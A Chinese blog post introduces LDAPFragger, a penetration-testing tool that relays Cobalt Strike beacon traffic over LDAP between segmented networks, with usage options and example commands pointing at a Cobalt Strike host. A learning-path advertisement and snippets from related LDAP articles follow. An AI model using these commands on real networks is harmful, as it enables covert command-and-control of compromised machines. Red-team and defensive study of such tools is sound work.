LDAPFragger:一款功能强大的命令控制C&C工具

最新推荐文章于 2025-06-12 10:14:11 发布
最新推荐文章于 2025-06-12 10:14:11 发布
阅读量362 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: git 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/text2203/article/details/128913263
LDAPFragger是一个设计用于渗透测试的工具,它利用LDAP协议在不同网络分段间传递CobaltStrike信标数据。该工具依赖.NETFramework,支持通过活动目录进行通信,并可选地使用LDAPS进行加密。文章还提供了工具的使用示例和一个全面的网络安全学习路径。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

关于LDAPFragger

LDAPFragger是一款功能强大的命令控制C&C工具,可以帮助广大研究人员使用用户属性和LDAP来路由Cobalt Strike信标数据。

在之前的一次针对组织内部网络的渗透测试过程中,我们遇到了物理分段网络。这些网络包含连接到同一活动目录域的工作站,但是只有一个网段可以连接到外网。为了使用Cobalt
Strike远程控制这两个网段中的工作站,我们构建了一个工具,该工具使用共享活动目录组件来构建通信通道。为此,该工具使用了针对活动目录的LDAP协议,并且能够有效地通过LDAP路由信标数据。

构建高级LDAP信道

下图显示的是信道建立的处理流程:

依赖组件

该工具需要使用.NET 4.0进行编译,但理论上也可以使用其他版本的.NET Framework。

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/fox-it/LDAPFragger.git

工具使用

_     _              __

| |   | |            / _|

| | __| | __ _ _ __ | |_ _ __ __ _  __ _  __ _  ___ _ __

| |/ _` |/ _` | '_ \|  _| '__/ _` |/ _` |/ _` |/ _ \ '__|

| | (_| | (_| | |_) | | | | | (_| | (_| | (_| |  __/ |

|_|\__,_|\__,_| .__/|_| |_|  \__,_|\__, |\__, |\___|_|

              | |                   __/ | __/ |

              |_|                  |___/ |___/

 

Fox-IT - Rindert Kramer

 

Usage:

     --cshost:  Cobalt Strike实例的IP地址或主机名

     --csport:  Cobalt Strike服务器的外部C2实例端口

     -u:        连接活动目录使用的用户名

     -p:        连接活动目录使用的密码

     -d:        活动目录域的FQDN

     --ldaps:    使用LDAPS代替LDAP

     -v:        Verbose输出模式

     -h:        显示工具帮助信息

 

If no AD credentials are provided, integrated AD authentication will be used.

工具使用样例

从网段A运行下列命令:

LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port>

 

LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN>

从网段B运行下列命令:

LDAPFragger

 

LDAPFragger -u <username> -p <password> -d <domain FQDN>

我们可以通过“–LDAPS”选项来启用LDAPS,此时常规的LDAP流量仍然会被加密。注意,此时默认的Cobalt Strike
Payload可能会被大多数AV捕捉到。

工具运行截图

最后

分享一个快速学习【网络安全】的方法,「也许是」最全面的学习方法:
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

在这里插入图片描述

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k。

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

想要入坑黑客&网络安全的朋友,给大家准备了一份:282G全网最全的网络安全资料包免费领取!
扫下方二维码,免费领取

有了这些基础,如果你要深入学习,可以参考下方这个超详细学习路线图,按照这个路线学习,完全够支撑你成为一名优秀的中高级网络安全工程师:

高清学习路线图或XMIND文件(点击下载原文件)

还有一些学习中收集的视频、文档资源,有需要的可以自取:
每个成长路线对应板块的配套视频:


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

因篇幅有限,仅展示部分资料,需要的可以【扫下方二维码免费领取】

什么是LDAP连接工具?如何利用好它.docx
05-29
# LDAP连接工具 LDAP是一种轻量级目录访问协议,用于在网络中访问分布式目录服务。要连接LDAP目录,需要一种LDAP连接工具。 以下是一些常用的LDAP连接工具: ## 1. Apache Directory Studio Apache Directory Studio是一个开源LDAP目录浏览器和编辑器。它提供了一个直观的界面,可以浏览和编辑LDAP目录。 ## 2. JXplorer JXplorer是一个跨平台的LDAP浏览器和编辑器。它提供了一个简单的用户界面,可以浏览和编辑LDAP目录。 ## 3. Softerra LDAP Browser Softerra LDAP Browser是一个LDAP浏览器和编辑器。它提供了一个直观的界面,可以浏览和编辑LDAP目录,并支持多种LDAP服务器。 ## 4. LdapAdmin LdapAdmin是一个LDAP浏览器和编辑器。它提供了一个简单的用户界面,可以浏览和编辑LDAP目录,同时支持多种LDAP服务器。 以上是一些常用的LDAP连接工具。如果要连接LDAP目录,请选择适合您的连接工具,并根据
LdapBrowser ldap连接工具
11-23
实用的 openldap连接工具 LdapBrowser-6.10.x-win-x86
LDAP应用技术简述
unix/linux学习
12-29 2311
原文链接 http://www.daifusecure.com/articles/ldap2.php一、             客户端访问工具; a)        openldap命令行; Openldap提供了在UNIX命令行下的访问工具集。包括ldapsearch,ldapadd,ldapmodify,ldappassword,ldapdelete等必要的工具。除了使用man获
LDAP客户端深入使用指南及应用实践
最新发布
weixin_42402664的博客
06-12 722
LDAP(Lightweight Directory Access Protocol),即轻量级目录访问协议,是一种用于访问和维护分布式目录信息服务的通信协议。它在IT行业中扮演着重要的角色,特别是在身份管理、用户认证和数据存储方面。LDAP是一种基于客户端-服务器模型的协议,支持目录信息的查询和更新操作。它主要用于存储如用户、组、设备等信息的大型集合,这些信息通常在组织内需要被多个应用共享。LDAP目录服务采用了树状的信息模型,使得信息的查询和管理变得高效。
LDAP数据构建工具LdapDataTool)
bossfriday - 个人博客
09-08 1724
LDAP数据构建工具实现
LDAP连接工具-方便开发人员的工具
11-26
可以直接连接ldap,用来为大数据集群环境设置权限,该工具是为环境添加ldap验证,维护用户名密码工具,简化了开发人员使用命令操作的尴尬
LdapAdmin---LDAP工具
12-01
win下非常好用的LDAP查看工具,非常稳定。最新版,64位。
非常好用的ldap连接工具
09-21
连接ldap工具试了好多,知道遇到她,ApacheDirectoryStudio~ 界面类似开发工具eclipse;目录结构清晰,图标也做了分类;好用!
LDAPFragger: 使用LDAP路由Cobalt Strike信标的命令控制工具
资源摘要信息:"LDAPFragger是一个专门设计用于命令和控制的攻击工具,它允许攻击者通过LDAP协议路由Cobalt Strike信标数据。Cobalt Strike是一个商业的攻击仿真工具,常被用于渗透测试和红队操作中。该工具的攻击...
LDAPFragger
03-08
LDAPFragger是一个命令和控制工具,攻击者可以使用用户属性使用LDAPFragger通过LDAP路由Cobalt Strike信标数据。 有关背景信息,请阅读发布博客: : 依赖项和安装 与.NET 4.0一起编译,但也可以与较旧和较新的...
: 用 Go 写一个轻量级的 ldap 测试工具
weixin_33782386的博客
12-12 325
前言 这是一个轮子。 作为一个在高校里混的 IT,LDAP 我们其实都蛮熟悉的,因为在高校中使用 LDAP 来做统一认证还蛮普遍的。对于 LDAP 的管理员而言,LDAP 的各种操作自然有产品对应的管理工具来处理,但对于需要集成 LDAP 的用户而言,我们经常需要做一些 LDAP 的测试来作为集成时的对比验证,脑补以下场景: 系统调试ing乙:“LDAP 认证走不通啊,你们的 LDAP ...
LDAP查看工具
09-12
LDAP浏览工具,解压后,双击运行lbe.old.bat,配置ldap信息后,即可连接查看
Go-ldap-test-tool一个轻量级的ldap测试工具
08-14
ldap-test-tool 一个轻量级的 ldap 测试工具
LdapAdmin工具
04-20
LdanAdmin工具,用户查询ldap数据库信息LdanAdmin工具,用户查询ldap数据库信息LdanAdmin工具,用户查询ldap数据库信息LdanAdmin工具,用户查询ldap数据库信息
ldaptest:使用 JDK LDAP 类的 LDAP 测试工具
07-09
A simple LDAP connection checker - by Tom Fonteyne Usage: java -jar ldaptest.jar -u <url> -b <baseDN> -f <filter> [-a attr1[,attr2]] [-D binddn -w password] [-rf|-ri|-rt] [-t [-n]]" Required:" -u url : in the format "ldap://server:port" -b baseDN : the base dn from which to search a user -f filter : a standard LDAP filter Optional: -p password : when set, the use
LDAPBrowser 4.5 x86 LDAP测试工具
07-20
LDAPBrowser4.5 x86 32位系统使用的LDAP测试工具
LDAP管理工具
沐浴清风
04-06 1019
在前面的内容中,应该懂得使用 LDAP 指令来进行增加,删除,修改,查询的操作。这对于小规模的管理,是很快的。但,相对于规模大的网络而言,这将变成管理上的瓶颈。有鉴于此,这里导入3种不同的管理工具,以方便不同环境,网络结构,以及操作系统的需求。 1.PHP-LDAPAdmin (Web-Base) 根据名称,有动态网页开发经验的人应该会看出。本节中要介绍的内容,肯定是...
LDAP客户端工具LDAP Browser介绍
热门推荐
Marshall_Ma的博客
03-28 1万+
LDAP集成之客户端工具LDAP Browser介绍
【免费下载】 推荐使用 ldap-test-tool:一款高效便捷的 LDAP 测试工具
gitblog_01036的博客
08-30 980
推荐使用 ldap-test-tool:一款高效便捷的 LDAP 测试工具 项目介绍 ldap-test-tool 是一款由上海教育团队开发的轻量级 LDAP 测试工具。它旨在为开发者和系统管理员提供一个简单、快速且功能丰富的 LDAP 测试环境。无论是进行 LDAP 认证测试、查询操作,还是批量处理用户数据,ldap-test-tool 都能提供强大的支持。 项目技术分析 ldap-test-t...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值